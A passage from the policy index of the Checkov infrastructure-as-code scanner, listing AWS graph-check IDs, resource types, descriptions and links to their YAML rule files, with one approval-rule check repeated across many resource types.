[AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 846 | CKV2_AWS_15 | resource | aws_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. 
| Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 847 | CKV2_AWS_16 | resource | aws_appautoscaling_target | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | -| 848 | CKV2_AWS_16 | resource | aws_dynamodb_table | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | -| 849 | CKV2_AWS_18 | resource | aws_backup_selection | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup | Terraform | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml) | -| 850 | CKV2_AWS_19 | resource | aws_eip | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | -| 851 | CKV2_AWS_19 | resource | aws_eip_association | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | -| 852 | CKV2_AWS_20 | resource | aws_alb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 853 | CKV2_AWS_20 | 
resource | aws_alb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 854 | CKV2_AWS_20 | resource | aws_lb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 855 | CKV2_AWS_20 | resource | aws_lb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 856 | CKV2_AWS_21 | resource | aws_iam_group_membership | Ensure that all IAM users are members of at least one IAM group. | Terraform | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml) | -| 857 | CKV2_AWS_22 | resource | aws_iam_user | Ensure an IAM User does not have access to the console | Terraform | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml) | -| 858 | CKV2_AWS_23 | resource | aws_route53_record | Route53 A Record has Attached Resource | Terraform | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml) | -| 859 | CKV2_AWS_27 | resource | aws_rds_cluster | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | -| 860 | CKV2_AWS_27 | 
resource | aws_rds_cluster_parameter_group | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | -| 861 | CKV2_AWS_28 | resource | aws_alb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | -| 862 | CKV2_AWS_28 | resource | aws_lb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | -| 863 | CKV2_AWS_29 | resource | aws_api_gateway_rest_api | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | -| 864 | CKV2_AWS_29 | resource | aws_api_gateway_stage | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | -| 865 | CKV2_AWS_30 | resource | aws_db_instance | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | -| 866 | CKV2_AWS_30 | resource | aws_db_parameter_group | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | -| 867 | CKV2_AWS_31 | resource | aws_wafv2_web_acl | Ensure WAF2 
has a Logging Configuration | Terraform | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml) | -| 868 | CKV2_AWS_32 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a response headers policy attached | Terraform | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml) | -| 869 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | -| 870 | CKV2_AWS_33 | resource | aws_appsync_graphql_api | Ensure AppSync is protected by WAF | Terraform | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml) | -| 871 | CKV2_AWS_34 | resource | aws_ssm_parameter | AWS SSM Parameter should be Encrypted | Terraform | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml) | -| 872 | CKV2_AWS_35 | resource | aws_route | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | -| 873 | CKV2_AWS_35 | resource | aws_route_table | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | -| 874 | CKV2_AWS_36 | resource | aws_ssm_parameter | Ensure terraform is not sending SSM secrets to untrusted 
domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | -| 875 | CKV2_AWS_36 | resource | data.http | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | -| 876 | CKV2_AWS_37 | resource | aws | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 877 | CKV2_AWS_37 | resource | aws_accessanalyzer_analyzer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 878 | CKV2_AWS_37 | resource | aws_acm_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 879 | CKV2_AWS_37 | resource | aws_acm_certificate_validation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 880 | CKV2_AWS_37 | resource | aws_acmpca_certificate_authority | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 881 | CKV2_AWS_37 | resource | aws_ami | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 882 | CKV2_AWS_37 | resource | aws_ami_copy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 883 | CKV2_AWS_37 | resource | aws_ami_from_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 884 | CKV2_AWS_37 | resource | aws_ami_launch_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 885 | CKV2_AWS_37 | resource | aws_api_gateway_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 886 | CKV2_AWS_37 | resource | aws_api_gateway_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 887 | CKV2_AWS_37 | resource | aws_api_gateway_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 888 | CKV2_AWS_37 | resource | 
aws_api_gateway_base_path_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 889 | CKV2_AWS_37 | resource | aws_api_gateway_client_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 890 | CKV2_AWS_37 | resource | aws_api_gateway_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 891 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_part | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 892 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 893 | CKV2_AWS_37 | resource | aws_api_gateway_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 894 | CKV2_AWS_37 | resource | aws_api_gateway_gateway_response | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 895 | CKV2_AWS_37 | resource | aws_api_gateway_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 896 | CKV2_AWS_37 | resource | aws_api_gateway_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 897 | CKV2_AWS_37 | resource | aws_api_gateway_method | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 898 | CKV2_AWS_37 | resource | aws_api_gateway_method_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 899 | CKV2_AWS_37 | resource | aws_api_gateway_method_settings | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 900 | CKV2_AWS_37 | resource | aws_api_gateway_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 901 | CKV2_AWS_37 | resource | 
aws_api_gateway_request_validator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 902 | CKV2_AWS_37 | resource | aws_api_gateway_resource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 903 | CKV2_AWS_37 | resource | aws_api_gateway_rest_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 904 | CKV2_AWS_37 | resource | aws_api_gateway_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 905 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 906 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 907 | CKV2_AWS_37 | resource | aws_api_gateway_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 908 | CKV2_AWS_37 | resource | aws_apigatewayv2_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 909 | CKV2_AWS_37 | resource | aws_apigatewayv2_api_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 910 | CKV2_AWS_37 | resource | aws_apigatewayv2_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 911 | CKV2_AWS_37 | resource | aws_apigatewayv2_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 912 | CKV2_AWS_37 | resource | aws_apigatewayv2_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 913 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 914 | CKV2_AWS_37 | resource | 
aws_apigatewayv2_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 915 | CKV2_AWS_37 | resource | aws_apigatewayv2_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 916 | CKV2_AWS_37 | resource | aws_apigatewayv2_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 917 | CKV2_AWS_37 | resource | aws_apigatewayv2_route_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 918 | CKV2_AWS_37 | resource | aws_apigatewayv2_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 919 | CKV2_AWS_37 | resource | aws_apigatewayv2_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 920 | CKV2_AWS_37 | resource | aws_app_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 921 | CKV2_AWS_37 | resource | aws_appautoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 922 | CKV2_AWS_37 | resource | aws_appautoscaling_scheduled_action | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 923 | CKV2_AWS_37 | resource | aws_appautoscaling_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 924 | CKV2_AWS_37 | resource | aws_appmesh_mesh | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 925 | CKV2_AWS_37 | resource | aws_appmesh_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 926 | CKV2_AWS_37 | resource | aws_appmesh_virtual_node | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 927 | CKV2_AWS_37 | resource | aws_appmesh_virtual_router | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 928 | CKV2_AWS_37 | resource | aws_appmesh_virtual_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 929 | CKV2_AWS_37 | resource | aws_appsync_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 930 | CKV2_AWS_37 | resource | aws_appsync_datasource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 931 | CKV2_AWS_37 | resource | aws_appsync_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 932 | CKV2_AWS_37 | resource | aws_appsync_graphql_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 933 | CKV2_AWS_37 | resource | aws_appsync_resolver | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 934 | CKV2_AWS_37 | resource | 
aws_athena_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 935 | CKV2_AWS_37 | resource | aws_athena_named_query | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 936 | CKV2_AWS_37 | resource | aws_athena_workgroup | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 937 | CKV2_AWS_37 | resource | aws_autoscaling_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 938 | CKV2_AWS_37 | resource | aws_autoscaling_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 939 | CKV2_AWS_37 | resource | aws_autoscaling_lifecycle_hook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 940 | CKV2_AWS_37 | resource | aws_autoscaling_notification | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 941 | CKV2_AWS_37 | resource | aws_autoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 942 | CKV2_AWS_37 | resource | aws_autoscaling_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 943 | CKV2_AWS_37 | resource | aws_backup_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 944 | CKV2_AWS_37 | resource | aws_backup_selection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 945 | CKV2_AWS_37 | resource | aws_backup_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 946 | CKV2_AWS_37 | resource | aws_batch_compute_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 947 | CKV2_AWS_37 | resource | aws_batch_job_definition | Ensure CodeCommit associates an 
